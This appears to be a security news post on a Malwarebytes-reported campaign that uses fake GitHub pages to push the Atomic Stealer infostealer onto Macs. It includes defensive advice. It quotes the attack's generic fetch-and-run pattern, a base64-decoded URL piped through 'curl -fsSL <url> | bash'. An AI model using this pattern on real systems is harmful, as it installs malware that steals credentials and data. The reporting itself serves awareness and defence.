Security researchers at Malwarebytes have uncovered a widespread campaign using fake GitHub pages to distribute macOS information-stealing malware. The operation impersonates legitimate software projects and tricks users into installing a strain of Mac infostealer dubbed Atomic Stealer.
These counterfeit pages mimic legitimate project repositories and sometimes appear in search results or through paid ads that direct users to GitHub instead of official vendor sites. Visitors to these pages encounter “download” or install buttons that lead to instructions for running a single command. This command fetches and executes a malicious shell script that installs the malware, bypassing normal safety checks.
Technical analysis reveals the installer’s typical pattern: a one-line shell command that decodes a base64 string to reveal a URL, then uses “curl -fsSL <url> | bash” to download and immediately run an install.sh script. This approach avoids download inspection and exploits the user’s shell to deliver the payload swiftly and stealthily. Such tactics are common in attacks aimed at macOS users to steal sensitive credentials, tokens, and other personal data.
The campaign’s reach is extensive. The threat actors impersonated dozens of well-known applications and services, ranging from password managers and developer tools to financial platforms and creative software. Some targets include Malwarebytes, LastPass, 1Password, Docker, Dropbox, Notion, Robinhood, Shopify, Thunderbird and various cryptocurrency projects, and researchers warn that this list is likely to grow as the campaign continues.
Malwarebytes’ tools, Malwarebytes for Mac and ThreatDown, does detect and block the Atomic Stealer variant. Still, prevention remains paramount. Users are advised to avoid running shell commands copied from untrusted web pages and to download software only from official vendor sources. Users should exercise caution before clicking on ads promising downloads, as sponsored search results are a common infection vector in this campaign.
For Macs already compromised, remediation can be challenging. Recommended actions include scanning with reputable anti-malware tools, removing suspicious persistence mechanisms such as rogue LaunchAgents and login items, and examining for unauthorized browser extensions or wallet applications.
Because some malware can establish persistent backdoors or infect backups, a full macOS reinstall from a clean source is recommended if suspicious activity persists. Users should also change all passwords and enable multi-factor authentication on important accounts after cleanup.
This campaign highlights the critical importance of cautious software installation practices and user awareness. Never execute commands directly from unfamiliar web sources, especially those piping downloads straight into a shell, and always verify download origins.
For more technical details and ongoing updates, read the full analysis report by Malwarebytes here.
Leave a Reply